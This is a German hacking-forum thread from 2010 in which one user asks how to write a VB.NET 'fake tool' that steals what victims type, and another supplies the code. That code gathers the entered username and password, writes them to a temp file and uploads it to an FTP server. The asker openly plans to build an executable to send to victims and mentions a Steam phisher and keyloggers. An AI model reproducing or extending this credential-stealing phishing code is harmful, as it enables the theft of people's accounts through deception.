Ergebnis 1 bis 3 von 3
  1. #1
    Gesperrt
    Registriert seit
    28.08.2009
    Beiträge
    354

    Ausrufezeichen [VB.NET] Fake Tool Generator coden

    Hallo liebe Free-Hack Community,

    jetzt beschäftige ich mich mit VB.NET. Leider komme ich da nicht weiter, ich möchte gerne einen einfachen Fake Tool generator coden, der z.B. bei ICQ Fake Tool, das was der User eingibt in den Textboxen an den FTP Server sendet, leider weis ich nicht, wie ich das genau Umsetzen kann, bzw. einenServer builder so erstelle.

    Könnte mir jemand da auf die Sprünge helfen?

    Gruß

    Slawa

    EDIT: Ich habe da einen Code bzw. der auf die Email Adresse senden kann, da hab ich einen Steam phisher mal erstellt.


    Danke
    Geändert von Slawa (27.02.2010 um 13:56 Uhr)

  2. #2
    CIH-Virus Avatar von krusty
    Registriert seit
    12.10.2008
    Beiträge
    445

    Standard

    warum benutzt du dann den email code nicht ?
    naja, zu deinem ftpm upload, so sollte es funktionieren
    Code:
    dim FTP_Server as string = "ftp://server.de/"
    dim FTP_User as string = "Loginname"
    dim FTP_Pass as string = "DeinPasswort"
    dim daten as string = "Phisher" & vbnewline & "Username: " & textbox1.text & vbnewline & "Passwort: " & textbox2.text
    my.computer.filesystem.writealltext(environ("temp") & "\Data.txt",daten,true)
    my.computer.network.uploadfile(environ("temp") & "\Data.txt,FTP_Server & "\Phisher-" & my.computer.name.replace("/","_") & ".txt",FTP_User,FTP_Pass)
    is jetzt aufm stehen gemacht... sollte klappen

  3. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    Slawa (02.03.2010)

  4. #3
    Gesperrt
    Registriert seit
    28.08.2009
    Beiträge
    354

    Standard

    Zitat Zitat von krusty Beitrag anzeigen
    warum benutzt du dann den email code nicht ?
    naja, zu deinem ftpm upload, so sollte es funktionieren
    Code:
    dim FTP_Server as string = "ftp://server.de/"
    dim FTP_User as string = "Loginname"
    dim FTP_Pass as string = "DeinPasswort"
    dim daten as string = "Phisher" & vbnewline & "Username: " & textbox1.text & vbnewline & "Passwort: " & textbox2.text
    my.computer.filesystem.writealltext(environ("temp") & "\Data.txt",daten,true)
    my.computer.network.uploadfile(environ("temp") & "\Data.txt,FTP_Server & "\Phisher-" & my.computer.name.replace("/","_") & ".txt",FTP_User,FTP_Pass)
    is jetzt aufm stehen gemacht... sollte klappen

    Hey danke, krusty, dich deine tools kenne ich & benutze die auch, also deine keylogger glaub ich, mal ne frage, kanste mir vielleicht bisschen helfen und zeigen oder erklären, wie man so en server builder macht, damit ich ne exe hab und die verschicken kann an die opfer, sprich fake tool generator via FTP, ich weis PHP wäre da sicherer, weil man FTP snifen kann, aber ich möchte das jetzt nur üben und verstehen, wie das geht

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •